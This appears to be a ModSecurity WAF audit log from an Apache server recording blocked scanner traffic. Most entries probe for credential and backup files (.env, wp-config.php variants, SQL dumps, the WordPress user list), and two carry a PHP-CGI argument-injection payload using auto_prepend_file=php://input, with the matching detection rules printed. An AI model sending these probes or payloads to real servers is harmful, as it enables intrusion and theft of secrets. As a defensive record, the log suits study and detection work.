Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7fba204e-Z--
--c44f4972-A--
[29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhbAAAAE4 103.236.140.4 48094 103.236.140.4 8181
--c44f4972-B--
GET /var/log/exception.log HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--c44f4972-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c44f4972-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873409573784 2492 (- - -)
Stopwatch2: 1745873409573784 2492; combined=855, p1=419, p2=411, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c44f4972-Z--
--34d12c7d-A--
[29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhbQAAAE8 103.236.140.4 48096 103.236.140.4 8181
--34d12c7d-B--
GET /.wp-config.php.swp HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--34d12c7d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--34d12c7d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873409799344 611 (- - -)
Stopwatch2: 1745873409799344 611; combined=236, p1=210, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--34d12c7d-Z--
--dda77c4d-A--
[29/Apr/2025:03:50:10 +0700] aA_qAgW3ctMdWeqW3LOhcAAAAFM 103.236.140.4 48104 103.236.140.4 8181
--dda77c4d-B--
GET /wp-content/debug.log HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--dda77c4d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dda77c4d-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873410194725 1931 (- - -)
Stopwatch2: 1745873410194725 1931; combined=708, p1=350, p2=330, p3=0, p4=0, p5=27, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dda77c4d-Z--
--659f8f30-A--
[29/Apr/2025:03:50:10 +0700] aA_qAgW3ctMdWeqW3LOhcgAAAFc 103.236.140.4 48108 103.236.140.4 8181
--659f8f30-B--
GET /wp-json/wp/v2/users HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--659f8f30-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--659f8f30-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||manage.bataranetwork.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873410625291 2826 (- - -)
Stopwatch2: 1745873410625291 2826; combined=1255, p1=415, p2=813, p3=0, p4=0, p5=27, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--659f8f30-Z--
--fd1b7a5c-A--
[29/Apr/2025:03:50:16 +0700] aA_qCAW3ctMdWeqW3LOhgwAAAFY 103.236.140.4 48158 103.236.140.4 8181
--fd1b7a5c-B--
GET /backup.sql HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--fd1b7a5c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fd1b7a5c-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873416358903 1873 (- - -)
Stopwatch2: 1745873416358903 1873; combined=713, p1=364, p2=315, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fd1b7a5c-Z--
--9ce2ba27-A--
[29/Apr/2025:03:50:16 +0700] aA_qCAW3ctMdWeqW3LOhhQAAAFc 103.236.140.4 48164 103.236.140.4 8181
--9ce2ba27-B--
GET /db_backup.sql HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--9ce2ba27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9ce2ba27-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873416576750 1227 (- - -)
Stopwatch2: 1745873416576750 1227; combined=430, p1=220, p2=194, p3=0, p4=0, p5=16, sr=47, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9ce2ba27-Z--
--cb59ad5e-A--
[29/Apr/2025:03:52:14 +0700] aA_qfsDCAfZpkPvVAPOdQAAAAIo 103.236.140.4 48620 103.236.140.4 8181
--cb59ad5e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A6010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--cb59ad5e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cb59ad5e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873534788341 814 (- - -)
Stopwatch2: 1745873534788341 814; combined=347, p1=310, p2=0, p3=0, p4=0, p5=37, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cb59ad5e-Z--
--ce2f163e-A--
[29/Apr/2025:03:53:53 +0700] aA_q4amWspnM_fF1r_5npwAAAAw 103.236.140.4 49002 103.236.140.4 8181
--ce2f163e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 143.110.210.125
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 143.110.210.125
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--ce2f163e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ce2f163e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873633789189 880 (- - -)
Stopwatch2: 1745873633789189 880; combined=372, p1=337, p2=0, p3=0, p4=0, p5=35, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ce2f163e-Z--
--faff0b72-A--
[29/Apr/2025:04:07:43 +0700] aA_uH8DCAfZpkPvVAPOeQQAAAIk 103.236.140.4 52294 103.236.140.4 8181
--faff0b72-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 188.166.47.25
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
Accept: */*
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force
Cookie:
X-Forwarded-For: 188.166.47.25
Accept-Encoding: gzip
X-Varnish: 136680971
--faff0b72-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--faff0b72-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745874463292042 789 (- - -)
Stopwatch2: 1745874463292042 789; combined=348, p1=313, p2=0, p3=0, p4=0, p5=35, sr=144, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--faff0b72-Z--
--dd304e22-A--
[29/Apr/2025:04:38:02 +0700] aA_1OlaiXvaz3oCHN0ie6wAAAMI 103.236.140.4 59952 103.236.140.4 8181
--dd304e22-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; VOG-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--dd304e22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dd304e22-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745876282939047 840 (- - -)
Stopwatch2: 1745876282939047 840; combined=363, p1=318, p2=0, p3=0, p4=0, p5=45, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dd304e22-Z--
--1c72f071-A--
[29/Apr/2025:04:46:37 +0700] aA_3PQW3ctMdWeqW3LOlMgAAAE8 103.236.140.4 33722 103.236.140.4 8181
--1c72f071-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62
Accept-Charset: utf-8
--1c72f071-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c72f071-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745876797316914 843 (- - -)
Stopwatch2: 1745876797316914 843; combined=388, p1=353, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c72f071-Z--
--e2439502-A--
[29/Apr/2025:06:16:40 +0700] aBAMWMDCAfZpkPvVAPOmKgAAAIU 103.236.140.4 54468 103.236.140.4 8181
--e2439502-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 194.233.88.144
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 194.233.88.144
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--e2439502-C--
--e2439502-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e2439502-E--
--e2439502-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745882200755402 4937 (- - -)
Stopwatch2: 1745882200755402 4937; combined=3134, p1=521, p2=2580, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e2439502-Z--
--eb1ac07e-A--
[29/Apr/2025:08:00:13 +0700] aBAknQW3ctMdWeqW3LOwRAAAAEg 103.236.140.4 50254 103.236.140.4 8181
--eb1ac07e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 35.216.255.218
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 35.216.255.218
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr
--eb1ac07e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eb1ac07e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745888413533076 874 (- - -)
Stopwatch2: 1745888413533076 874; combined=408, p1=367, p2=0, p3=0, p4=0, p5=41, sr=122, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eb1ac07e-Z--
--68e57301-A--
[29/Apr/2025:08:20:23 +0700] aBApV8DCAfZpkPvVAPOuGgAAAJg 103.236.140.4 54978 103.236.140.4 8181
--68e57301-B--
GET /wp-config.php.orig HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.216.113.180
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.216.113.180
X-Forwarded-Proto: http
Connection: close
Accept: */*
--68e57301-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--68e57301-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745889623391585 916 (- - -)
Stopwatch2: 1745889623391585 916; combined=392, p1=340, p2=0, p3=0, p4=0, p5=52, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--68e57301-Z--
--ebecc81e-A--
[29/Apr/2025:08:56:16 +0700] aBAxwMDCAfZpkPvVAPOwDAAAAII 103.236.140.4 35132 103.236.140.4 8181
--ebecc81e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 143.110.210.125
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 143.110.210.125
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--ebecc81e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ebecc81e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745891776631093 763 (- - -)
Stopwatch2: 1745891776631093 763; combined=332, p1=300, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ebecc81e-Z--
--2756641b-A--
[29/Apr/2025:09:14:17 +0700] aBA1-cDCAfZpkPvVAPOxIAAAAJc 103.236.140.4 39374 103.236.140.4 8181
--2756641b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.76
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.76
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2
Accept-Charset: utf-8
--2756641b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2756641b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745892857714024 797 (- - -)
Stopwatch2: 1745892857714024 797; combined=377, p1=340, p2=0, p3=0, p4=0, p5=36, sr=134, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2756641b-Z--
--a6b78169-A--
[29/Apr/2025:09:40:03 +0700] aBA8A1aiXvaz3oCHN0iuAAAAAMM 103.236.140.4 45628 103.236.140.4 8181
--a6b78169-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.70.87
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.70.87
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
Accept-Charset: utf-8
--a6b78169-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a6b78169-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745894403418300 953 (- - -)
Stopwatch2: 1745894403418300 953; combined=404, p1=349, p2=0, p3=0, p4=0, p5=55, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a6b78169-Z--
--24c4103f-A--
[29/Apr/2025:10:00:06 +0700] aBBAtgW3ctMdWeqW3LO2SAAAAFQ 103.236.140.4 50350 103.236.140.4 8181
--24c4103f-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 183.220.231.212
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 183.220.231.212
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--24c4103f-C--
--24c4103f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--24c4103f-E--
--24c4103f-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745895606674194 17511 (- - -)
Stopwatch2: 1745895606674194 17511; combined=27944, p1=546, p2=2585, p3=0, p4=0, p5=12426, sr=130, sw=0, l=0, gc=12387
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--24c4103f-Z--
--b060e937-A--
